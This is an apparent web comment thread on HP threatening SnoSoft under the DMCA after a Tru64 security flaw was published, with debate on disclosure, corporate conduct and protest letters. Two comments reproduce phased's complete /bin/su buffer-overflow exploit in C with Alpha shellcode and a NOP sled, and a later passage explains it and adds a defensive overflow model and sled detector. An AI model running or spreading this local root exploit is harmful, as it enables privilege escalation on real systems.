HP Uses DMCA To Quash Vulnerability Publication
Several readers wrote to note the fact that HP has evidently threatened to use the DMCA and computer crime laws against SnoSoft who have found a security flaw in Tru64. The quote from the HP VP is that the accused "could be fined up to $500,000 and imprisoned for up to five years."
So this is the real reason HP didn't want Bruce Perens to demonstrate against the DMCA?
Very mature compared to what big business does. "Wahh wahhh wahh!!! Help us Uncle Sam, we're poor defenseless transnational corporations!" Buncha whiners.
People shape laws. Not the other way around.
When Alan Cox originally discussed the notion that companies would (mis)use the DMCA in the security field, he was widely attacked for being silly.
Anyone still feel like laughing?
Halfway around the world, Bill Gates breathes a long sigh of relief as Microsoft's profitability is assured well into the next century...
-Chris
--an unbreakable toy is useful for breaking other toys--
Finisterre said that while he wanted to resolve the dispute with HP, he resented receiving DMCA threats. "We are like the guys that found out that Firestone tires have issues on Ford explorers," he said. "It's not our fault your Explorer has crap tires. We just pointed it out. We should not get attacked for pointing out issues in someone's product nor for proving it is possible."
When will people learn this is the same thing?
It was legitimate for you to cooperate with HP's valid concern that, as a "deep pockets" organization it would be too risky for them to let you challenge the DMCA. I understood that.
But now it appears that you work for a company that is using the DMCA as a club to suppress discussion of security flaws. It doesn't seem that the two hats you wear (your HP role and your open source leadership role) are compatible unless you can persuade HP to back off.
It is possible, of course, that the DMCA threat is coming from one manager who is shooting his mouth off. If so, we need a clarification from higher management: is it the policy of HP to use the DMCA to suppress discussion of their security flaws, or not?
* Technically, they only threatened to invoke the DMCA. As of now, HP has also only threatened to invoke it.
-- Don't Tase me, bro!
"On July 19, a researcher at SnoSoft posted a note to SecurityFocus.com's popular Bugtraq mailing list with a hyperlink to a computer program letting a Tru64 user gain full administrator privileges. The researcher, who goes by the alias "Phased," said in the message: "Here is the warez, nothing special, but it does the job." "
Call me crazy, but if I were a mega-corporation, I wouldn't want someone releasing "warez" to break into my systems this way. If this was announced in a different way, like say a formal research group contacting the company privately with test results, instead of just some random person posting under an alias to an open list like BugTraq, things might be different.
Come to the University of Mars! Classes starting soon!
this is really a shame. hp was one of the technology companies that had a lot going for it.
when you are fighting in a tough market *and* trying to make a merger happen without too much bad stuff, it seems that it is counter-productive to play this game: you make people mad, you spend resources (money and man-hours that could be easily used elsewhere) and you are *not* going to achieve the immediate goal of suppressing bad stuff (real or imagined).
so hp gets more points in the bad pr column, they waste money, and the problem doesn't go away. i hope that they spin off the printer division before they crash and burn.
eric
p.s. i guess the worst part is that hp *didn't* learn from all the other companies that went down this path.
got fed up of corporate bullshit
here is the warez, nothing special, but it does the job
note, this is just one of many many exploitable bofs in tru64 5.x
http://deepmagic.securify.org.uk:8080/su.c
phased
phased@mail
The part that says "Thou shalt not give multi-billion dollar companies, who buy laws, a hard time."
python -c "x='python -c %sx=%s; print x%%(chr(34),repr(x),chr(34))%s'; print x%(chr(34),repr(x),chr(34))"
in other news today the FBI raids the offices of SnoSoft in search of DMCA-prohibited cracking tools; they immediately seize compilers, source code, and felt markers.
- Security through Obscurity
and- Security through Diligence
we now add the mighty- Security through Litigation?
To be fair, when do the handgun designers go to jail again?
Kevin Fox
Ok someone fill me in here:
How on earth does a law pertaining to the circumvention of copyright protection systems apply at all to someone releasing a security flaw in an operating system?
The public has the right to know about these security flaws, just as much as we have the right to know if the tires we buy pass safety standards.
HP trying to cover this up just proves it's a problem. HP is using the DMCA to prevent people from discussing valid flaws in their OSes.
People have the right to know if the car they're driving -- or are going to buy -- is unsafe. Why? Because their lives depend on it, literally. For the same reason, people have the right to know if the OS they're using is secure. Why? Because their lives depend on it, or at least their careers. Data important to one's career (i.e., scientific experimental data) is stored on one's computer. Private information -- i.e., credit card information -- is stored on a computer. Security holes can literally destroy one's life.
We have the right to know exactly what problems there are in our software.
social sciences can never use experience to verify their statemen
This is just another reason to say "fuck you, the new HP" and run faster to Linux and *BSD. Admittedly, anyone who has recently had to compare the price of an ES40 and an equivalent amount of Intel-compatible compute is probably already heading there...
Still, this sort of head-in-the-sand response to security vulnerabilities is not a good way to make happy customers. Obviously, the exploit exists; what HP apparently wants to do is make sure that it only gets passed around on IRC so that admins can get completely blindsided.
Of course, Compaq already killed the Alpha, and don't get me started on their support contracts (OK, so they inherited those). It's almost as if they don't want customers (well, DigitalUNIX/Tru64 customers probably *are* a bit of a pain in the ass, compared to MCSEs).
It's just sad to see the last bits of the carcass of what was once a pretty cool company (DEC) get so abused.
Email their president and CEO from this page!
Tell her in NICE non flaming tones why you feel what they are doing is wrong. Explain that this kind of action makes you unwilling to buy any more products from them.
--Won't that be grand? Computers and the programs will start thinking and the people will stop. - Dr. Walter Gibbs
HP Classic would never have pulled a stunt like this. They would have gone, "Oops, my bad, here's a bugfix everyone."
As time goes on, it looks more and more as if Walter Hewlett and David Packard were right: This whole "New HP" thing is just so much hogwash.
Schwab
Editor, A1-AAA AmeriCaptions
For those of you who are HPaq-ese impaired, here is the message:
Dear HPaq customers,
We thank you for having purchased our products in the past, but now that we have finalized our merger and cashed our options, we have lost our minds and come to the boggling conclusion that we don't want your money anymore. Please do not buy our products because honestly you can't trust us to inform you when there is a defect with our product. This includes any servers, and handhelds our merger partner might peddle, printers, or whatever the hell it is these people do. As a sign of our gratitude for your service, we will be providing each future customer with a free Berber mousepad under which you can sweep any problems you discover. If you believe the problem doesn't exist, and we believe the problem doesn't exist, then we can work together to warp reality and drive customers away like poor starving slobs on the street corner to a free luncheon. Personally, I don't recommend you use these things in anything that might risk a human life or attempt to improve society in any way. Heck, I wouldn't run my porn servers on this crap. Well, gotta run, my coke dealer is here. And don't forget to F off!
P.S. - Don't unravel the mousepad to see how it's made or we'll sue your ass into orbit under the DMCA.
"Beware of he who would deny you access to information, for in his heart, he dreams himself your master."
HP should be thanking them
This is a bad thing for HP. The thing is, hackers love to share their code with the world. And there are two ways to exploit that obsessive desire, either through good (white hat) mechanisms or through bad (cracker) mechanisms. If HP prevents hackers from researching exploits in a legitimate fashion, it won't stop the hackers -- they'll just only leak their hacks onto Eastern European warez websites outside of the reach of US law. HP won't be aware of anything until it's too late and millions of dollars of damage have already been done by malicious parties. It's like that old saw about gun ownership: When hacking software is a crime then only criminals will hack your software.
There are two kinds of people: 1) those who start arrays with one and 1) those who start them with zero.
Yep. Murderers don't kill people; guns do! Don't send the murderers to jail; go after the gun manufacturers.
The USC made a stupid law; just because a stupid law exists it does not mean that it should be used to quash legitimate research. If Carly had half a brain, she would fire the idiot VP and apologize to Snosoft. But don't count on it happening anytime soon.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
char shellcode[]= "\x30\x15\xd9\x43" "\x11\x74\xf0\x47" "\x12\x14\x02\x42" "\xfc\xff\x32\xb2" "\x12\x94\x09\x42" "\xfc\xff\x32\xb2" "\xff\x47\x3f\x26" "\x1f\x04\x31\x22" "\xfc\xff\x30\xb2" "\xf7\xff\x1f\xd2" "\x10\x04\xff\x47" "\x11\x14\xe3\x43" "\x20\x35\x20\x42" "\xff\xff\xff\xff" "\x30\x15\xd9\x43" "\x31\x15\xd8\x43" "\x12\x04\xff\x47" "\x40\xff\x1e\xb6" "\x48\xff\xfe\xb7" "\x98\xff\x7f\x26" "\xd0\x8c\x73\x22" "\x13\x05\xf3\x47" "\x3c\xff\x7e\xb2" "\x69\x6e\x7f\x26" "\x2f\x62\x73\x22" "\x38\xff\x7e\xb2" "\x13\x94\xe7\x43" "\x20\x35\x60\x42" "\xff\xff\xff\xff";
main(int argc, char *argv[]) {
int i, j; char buffer[8239]; char payload[15200];
char nop[] = "\x1f\x04\xff\x47"; bzero(&buffer, 8239); bzero(&payload, 15200); for (i=0;i<8233;i++) buffer[i] = 0x41;
buffer[i++] = 0x01; buffer[i++] = 0x04;
buffer[i++] = 0x01; buffer[i++] = 0x40;
buffer[i++] = 0x01;
for (i=0;i<15000;) { for(j=0;j<4;j++) { payload[i++] = nop[j]; } }
for (i=i,j=0;j<sizeof(shellcode);i++,j++) payload[i] = shellcode[j];
printf("/bin/su by phased\n");
printf("payload %db\n", strlen(payload));
printf("buffer %db\n", strlen(buffer));
execl("/usr/bin/su", "su", buffer, payload, 0);
}
The theory of relativity doesn't work right in Arkansas.
Perhaps HP - having stopped Bruce Perens from protesting against the DMCA via civil disobedience - is attacking it via a reductio ad absurdum method. i.e. Showing exactly how it violates the principles of Free Speech. It's officially illegal to state that the Emperor has no clothes.
Zoe Brain - Rocket Scientist
I am quite disappointed with HP's recent conduct with two issues related to the DMCA. I am in a senior enough position as a UNIX administrator that I have significant impact in how a multi-million dollar IT budget is spent. HP's invocation of the DMCA reduces my trust in HP as a vendor of secure and reliable technology. Therefore I am less inclined now than I ever have been in the past to purchase HP products.
The first issue is HP's request that Bruce Perens not present his findings on DVD copyright controls. If he is acting on his own behalf, and includes a disclaimer that this is a separate issue from what he does under the employment of HP, he should be allowed to go forth. If he is presenting HP intellectual property, HP has the right and responsibility to protect itself. This, however, does not seem to be the case.
The more disturbing issue is with regards to the handling of SnoSoft's publication of root exploits to the Tru64 operating system. As a UNIX administrator, I am responsible for researching technologies that I will put into production. Many times, these products are used to protect the intellectual property, stability, or other things that are of great importance to my employer's success and my career. If security researchers cannot force many of the bugs out in the open before I evaluate products, I have much more work on my hands. Furthermore, if I find a bug that I know can be used to compromise my system, without the ability to publicly discuss and disclose the bug, I may be unable to get a fix from the vendor or a home-grown workaround. If I am at the complete mercy of my vendors' good will, I fear that I will have a system that lacks stability and security.
Please reconsider your decision to use the Digital Millennium Copyright Act to stifle free speech. Once you come to the realization that the DMCA is not a law that is useful for HP, please put your lobbying efforts into repealing it and push for funding to enforce pre-DMCA laws that already provide more than adequate protections on copyright and other intellectual property issues.
I do not speak for my employer. Please remember, however, that my employer trusts me to make decisions that are in the employer's best interest. Your actions suggest that the purchase of HP products is in the best interest of no employer that I would work for.
Let the crackers have it.
...richie - It is a good day to code.
So free speech is good for academics, but not for random hacker?
What difference does it make who finds and reports a bug? The cool thing about the Internet is that you don't have to be a professor at MIT to publish security exploits. The publications speaks for itself.
And if I'm running affected software, I don't care who reports the problem - as long as I find out and get a fix.
Would you still feel the same if your bank kept your accounts on Tru64 HP machines?
...richie - It is a good day to code.
Mrs Fiorina,
I work for a retailer -- Best Buy -- which sells a large volume of HP and Compaq products. I have long been a fan of Hewlett Packard, but some recent news is troubling me.
Kent Ferson's reaction to Phased's posting of the security vulnerability in Tru64 was nothing short of shockingly irresponsible.
Not only am I disturbed that there was no statement of any intent to fix the security hole, but I am shocked at the threat of a lawsuit under the DMCA. You should be grateful that the hole was brought to your attention before it became a widespread problem, not to mention that had you fixed it in a timely manner (as the hole was revealed to you by SnoSoft last year), this would never have been a problem.
This reaction tells me that not only is HP/Compaq concerned more with their image than with ensuring the quality of their products, but that "The New HP" would rather abuse copyright law by "shooting the messenger" than issue a responsible statement, and repair an error before it becomes a problem.
I'll be waiting in the next few days for a press release or some other statement denouncing Mr. Ferson's actions, and showing that HP has plans to repair the hole in Tru64. Until this happens, I'm not sure I'll be able to recommend that anyone give their money to Hewlett Packard.
Looking forward to your response.
[Name Removed]
--
"I personal[ly] think Unix is "superior" because on LSD it tastes like Blue." -- jbarnett
Bruce, if I were president of HP, I would immediately fire Kent Ferson, the vice president who wrote the letter. The letter says, basically, that HP is not able to fix the problem, and would rather hide its security problems.
This is a marketing disaster for HP. Probably Mr. Ferson has little technical knowledge and does not realize that his letter speaks loudly and clearly to the whole world of technically knowledgeable people, and does irreparable damage to HP.
We live in an amazing world where free products are better than expensive ones. The open source response to a security problem is to have a bug fix on all the mirrors in 48 hours. The response of billion dollar companies with tens of thousands of well-paid employees is to try to weasel out of doing the right thing. Who would have guessed it would be that way?
It seems that you could do HP a big favor if you could educate top management. But maybe they are not educable.
Just in case a few of us here don't know about him: you can find his homepage here, and in his bio you can find:
" Hewlett-Packard Corporation - 2000 to Present
Senior strategist, Linux and Open Source. I am the first Open Source evangelist to gain a role in top management of a multi-Billion-dollar corporation. On the org chart there are only three people between me and the CEO - a general manager, a vice president, and a president. Among my assignments is to challenge HP management."
So he's in position to speak up in this case.
Note: I don't know if it's redundant but I'm sure some people would like to know. I don't ask for any mod points.
I dont see the point of taking HP to task for it. .. whoopdee doo.
.. what we need is a change in the law.
.. too often a flaw gets found and the company sweeps it under the rug maybe they'll fix it in the next version but prior versions are vulnerable.
.. why can't I do it with the applications I use and store my deeply personal information (from baby pictures to tax and health records) on?
It's a waste of time. Even if they back off
Please
Hackers can expose findings and report them to companies
Given the sad fact that all our politicians (not just in america but worldwide are elected by money) maybe the following compromise can be reached:
a) Hackers who find vulnerabilities must email a notice and description to the company. He must try to give at least 24 hours' notice before announcing it to the public unless he knows of an imminent exploit in the wild (like an impending mass DDoS attack or something). In that case he should be allowed to announce it to the public immediately.
b) Companies that take no action (that is, don't make a patch available/requestable) on a vulnerability that was reported to them but not announced to the public are liable for exploits.
c) The setup of a third party security company or government department where hackers can email reports of finding vulnerabilities. This is like CERT or bugtraq but the organization must have the funding and capability to pursue inaction on the part of companies that do not fix reported and well documented security flaws.
Is there any way for you to use your publicity to bring something like this about?
At least try. I hate the fact that curiosity is now a crime. I am allowed to take apart my car and see how it works
Thanks,
Johan
I can see it here, US Government is progressively inventing laws that ensures:
....Imagine, no violence, no crime, no hunger...a perfect world!
Only the Government can investigate crimes.
Only the Government can test, examine, uncover defects in consumer products
Only the Government can perform reverse engineering on anything
Only the Government is allowed to use top-grade encryption
The scope of Free Speech is defined by senators, and it happens that no constitutional rights are being intruded upon.
That's to say, US would become a country where citizens, by laws, SHOULD trust the Government and any questions on the already established laws and regulations are prohibited.
What's wrong with the picture? I don't know, but I've read a novel about a country whose government has absolute power over its citizens and no citizen is allowed to question the decisions of the government. This government does not use any military power or violence to control its citizens, but laws.
IIRC at the end of this story all the citizens end up living in an array of big tubes of liquid, and the rest of the rebels are either jailed (brains separated from their bodies) or terminated (become food for others). It's like The Matrix, but this time some humans control everything.
Don't say it...don't say it...I'm warning you...
Use Linux.
Damn, I said it.
Why the fuck don't people want exploits fully disclosed? Sure, I don't have a problem with waiting a week or so to give a team/vendor (yes, even Microsoft) a chance to roll out a patch before making it public. It's a courtesy, not a necessity.
<rant />
Clearly some sort of political action is required. I suggest:
1. The DMCA needs to be repealed or ruled unconstitutional. Hopefully the ACLU or the EFF will take a case that'll get us there. Or some rich philanthropist geek could 'violate' it by exercising their constitutional rights. But the best ploy is for every one of *us* to contact (visit,snailmail,fax,call,email) 'our' reps in the House and Senate, rationally outline our objections, and protest like hell if they don't. Civil disobedience, etc.
2. Abolish corporate personhood (same methods).
3. Abolish the lobby industry.
4. Abolish campaign finance. Make it publicly funded, free TV-radio spots (public airwaves) equally distributed among ballot-qualified candidates.
We've let corporations have far too much swing. I'm all for making a buck, but Jesus F***ing Christ...
Today I read an article on news.com (http://news.com.com/2100-1023-947325.html) that Hewlett-Packard has intended to use the Digital Millennium Copyright Act (DMCA) to punish a company that has released information about a security vulnerability in an HP product. For quite some time I have been telling you that the DMCA is a bad law that needs to be repealed, and this is just more evidence to that effect. HP has known about this vulnerability for a year, but has chosen to do nothing to fix it.
HP's action could set a precedent that would stifle technology research. Companies would be free to release broken technologies that would eventually be used in high-security environments. Anyone who attempted to test the strengths of these products would be branded a criminal.
HP's customers and the American public deserve to know about security issues in HP's products. Withholding such information is just like the accounting scandals that have been rampant in recent times. Insecure technology is a weapon that hackers and terrorists can use against us. So when an American company decides to hide behind an American law rather than fix it products, our politicians need to re-examine that law.
I urge you to sponsor legislation that will repeal the DMCA. Americans deserve better. Please write back to me and let me know that you support my fair use rights in a digital world, and that you'll be working to repeal the DMCA.
And the men who hold high places must be the ones who start
To mold a new reality... closer to the heart
In my investigation, I read the Snosoft home page. This is the second sentence of their introductory paragraph:
Now, I don't know any of the people involved or how they really do business, and thus I am not ready to make any allegations. But that sentence sounds a bit like a shakedown, doesn't it?
I would hate to be manipulated in a shakedown of my own company.
On the other hand, some people say this is a year-old bug and that there was long correspondence before one of the employees finally revealed it. I don't know if that's true yet.
What do you think?
Bruce
Bruce Perens.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>   /* bzero() */
#include <unistd.h>
char shellcode[]=
"\x30\x15\xd9\x43" "\x11\x74\xf0\x47" "\x12\x14\x02\x42" "\xfc\xff\x32\xb2" "\x12\x94\x09\x42" "\xfc\xff\x32\xb2" "\xff\x47\x3f\x26" "\x1f\x04\x31\x22" "\xfc\xff\x30\xb2" "\xf7\xff\x1f\xd2" "\x10\x04\xff\x47"
"\x11\x14\xe3\x43" "\x20\x35\x20\x42" "\xff\xff\xff\xff" "\x30\x15\xd9\x43" "\x31\x15\xd8\x43" "\x12\x04\xff\x47" "\x40\xff\x1e\xb6" "\x48\xff\xfe\xb7" "\x98\xff\x7f\x26" "\xd0\x8c\x73\x22" "\x13\x05\xf3\x47" "\x3c\xff\x7e\xb2" "\x69\x6e\x7f\x26" "\x2f\x62\x73\x22" "\x38\xff\x7e\xb2" "\x13\x94\xe7\x43" "\x20\x35\x60\x42" "\xff\xff\xff\xff";
int main(int argc, char *argv[]) {
int i, j;
char buffer[8239];                 /* first argument: filler followed by the address bytes */
char payload[15200];               /* second argument: NOP sled followed by the shellcode */
char nop[] = "\x1f\x04\xff\x47";   /* Alpha NOP, bis $31,$31,$31 (0x47ff041f) */
bzero(&buffer, 8239);
bzero(&payload, 15200);
for (i=0;i<8233;i++)
buffer[i] = 0x41;
/* five address bytes, little-endian: 0x140010401 */
buffer[i++] = 0x01;
buffer[i++] = 0x04;
buffer[i++] = 0x01;
buffer[i++] = 0x40;
buffer[i++] = 0x01;
for (i=0;i<15000;) {               /* 3750 NOPs */
for(j=0;j<4;j++) {
payload[i++] = nop[j];
}
}
for (i=i,j=0;j<sizeof(shellcode);i++,j++)   /* shellcode (with its NUL) right after the sled */
payload[i] = shellcode[j];
printf("/bin/su by phased\n");
printf("payload %db\n", (int)strlen(payload));
printf("buffer %db\n", (int)strlen(buffer));
execl("/usr/bin/su", "su", buffer, payload, (char *)0);
return 1;                          /* only reached if execl fails */
}
The theory of relativity doesn't work right in Arkansas.
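The su exploit posted above (both copies in this thread) works by handing su one argument long enough to overrun a fixed-size buffer, with a chosen address at the end, and a second argument that is almost entirely Alpha NOPs. As an added example, not code from phased's post and not HP's Tru64 source (which the thread never shows), the C below models that bug class beside the bounded copy that closes it, and adds a small detector for the NOP sled the payload is built from. The 32-byte buffer size, the function names and the sample inputs are assumptions for illustration.

```c
/* Added example: a model of the bug class behind the su exploit (unbounded
 * copy of an argv string into a fixed stack buffer) beside the bounded copy
 * that closes it, plus a detector for the Alpha NOP sled the payload uses.
 * Buffer size, names and samples are assumptions, not Tru64's real su code. */
#include <stdio.h>
#include <string.h>

#define NAME_BUF_ASSUMED 32   /* assumed fixed buffer size for the model */

/* Alpha "bis $31,$31,$31" (0x47ff041f), the NOP the posted payload repeats. */
static const unsigned char ALPHA_NOP[4] = { 0x1f, 0x04, 0xff, 0x47 };

/* VULNERABLE shape: strcpy with no bound. Any argument longer than
 * NAME_BUF_ASSUMED-1 bytes writes past name[] into whatever the compiler
 * placed after it on the stack. Shown for contrast; never call it with
 * untrusted input. */
int copy_arg_unsafe(const char *arg)
{
    char name[NAME_BUF_ASSUMED];
    strcpy(name, arg);
    return (int)strlen(name);
}

/* HARDENED: measure with a bound first and refuse what does not fit, rather
 * than silently truncating. Returns the copied length, or -1 on overflow. */
int copy_arg_safe(const char *arg, char *out, size_t outsz)
{
    size_t n = 0;
    while (n < outsz && arg[n] != '\0')
        n++;
    if (n >= outsz)               /* no room for the terminating NUL */
        return -1;
    memcpy(out, arg, n + 1);
    return (int)n;
}

/* Longest run of consecutive Alpha NOPs in buf. Greedy consumption of four
 * bytes per match is safe because no suffix of the NOP is also its prefix. */
size_t longest_nop_run(const unsigned char *buf, size_t len)
{
    size_t best = 0, run = 0, i = 0;
    while (i + 4 <= len) {
        if (memcmp(buf + i, ALPHA_NOP, 4) == 0) {
            run++;
            i += 4;
        } else {
            if (run > best)
                best = run;
            run = 0;
            i++;
        }
    }
    return run > best ? run : best;
}

/* Policy check an exec wrapper or audit hook could apply to a setuid
 * program's arguments: flag anything longer than max_len, or carrying a
 * sled of at least min_sled NOPs. */
int argument_is_suspicious(const char *arg, size_t max_len, size_t min_sled)
{
    size_t len = strlen(arg);
    if (len > max_len)
        return 1;
    return longest_nop_run((const unsigned char *)arg, len) >= min_sled;
}

/* Constructed sample: 64 NOPs followed by 8 opaque bytes, the shape of the
 * exploit's second argument. Returns the sled length the detector reports. */
size_t demo_sled_length(void)
{
    unsigned char payload[64 * 4 + 8];
    for (int i = 0; i < 64; i++)
        memcpy(payload + i * 4, ALPHA_NOP, 4);
    memset(payload + 64 * 4, 0x41, 8);
    return longest_nop_run(payload, sizeof payload);
}

/* Constructed sample: an 8238-byte argument like the exploit's first one.
 * Returns 1 if the bounded copy refuses it. */
int demo_safe_copy_rejects_long_arg(void)
{
    static char big[8239];
    char out[NAME_BUF_ASSUMED];
    memset(big, 'A', sizeof big - 1);
    big[sizeof big - 1] = '\0';
    return copy_arg_safe(big, out, sizeof out) == -1;
}

int main(void)
{
    char out[NAME_BUF_ASSUMED];
    printf("copy_arg_safe(\"root\")  -> %d\n", copy_arg_safe("root", out, sizeof out));
    printf("long argument rejected -> %d\n", demo_safe_copy_rejects_long_arg());
    printf("sled length in sample  -> %zu\n", demo_sled_length());
    printf("\"root\" suspicious?     -> %d\n", argument_is_suspicious("root", 64, 16));
    return 0;
}
```

The real fix is the bounded copy, not the pattern match: argument_is_suspicious is the kind of check a wrapper around a setuid binary could apply before the exec to catch this specific payload shape, but an attacker can pad with any other instruction sequence, so it only buys detection, never safety.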
As long as what you say doesn't jeopardize national security, suggest an interest in terrorism, reveal trade secrets, infringe on copyrights, trademarks, or patents, isn't a description of sexual activities involving anyone under the age of majority, isn't disruptive, doesn't explain how to circumvent copyright, doesn't explain how to acquire or use drugs, isn't seditious, doesn't reveal trade secrets, doesn't threaten our vital national unity during this ongoing and arduous war against terrorism, and is otherwise relatively inoffensive, you can say almost anything you like in the US.
I think HP is wrong with its DMCA style threats, because they are not appropriate. However, I can sympathise with HP and understand why they may have "lashed out". I think the hacker in question was wrong to irresponsibly post the exploit for script kiddies to start playing with fire. For all the debate about various sorts of disclosure processes, it's quite clear that this approach potentially has a high impact upon any deployed systems and gives no time for either the vendors or the administrators to take action. This is just not a responsible real-world approach to dealing with security issues.
-- Matthew - matthew.gream@pobox.com, http://matthewgream.net
The EFF I respect. I understand their issues, and the fact that we are totally under assault by corporations who want to chop up the digital world and sell it to us at as much as we can possibly afford to pay. Digital "Coal Towns" (look it up if you want to see some of America's greatest corporate crimes against humanity in the past).
/. crowd, I'd like to say lets stick to what we are specifically interested with on this board... and not give money to people who would love to "engineer through legislation" a power struggle at the expense of some Americans over other Americans.
As a member of the media, and a person that touches base with the ACLU every few weeks, I'll say that the ACLU is no longer interested in civil liberties, but more interested in legislating this society to a direction that they would prefer us to act. Trying to modify behavior through legislation is very different than protecting the right for us to act the way WE WANT TO ACT.
As of late, they seem to be interested in anyone but a person interested in computers. After talking with me several times face to face, the local rep of the ACLU has pretty much explained about their crusade against private Christian schools (please note the stressing of private) and their deemed "objectionable behavior" by those schools, and active interest in what goes on inside those schools. Those activities are rather curious for an organization like the ACLU, are they not?
After talking to them about these subjects, I would never, EVER give them another dollar. They appear to represent the civil liberties of only SOME AMERICANS. OF COURSE, before I get slapped back, I would like to repeat this... imho, IMHO, IMHO!
So as a member in good standing of the
This is a call to not listen to the ACLU. For computer issues, please stick your money to the EFF. The ACLU has gotten batty in its old age, and is trying to change the way we think, which the last time I checked, is a CIVIL LIBERTY.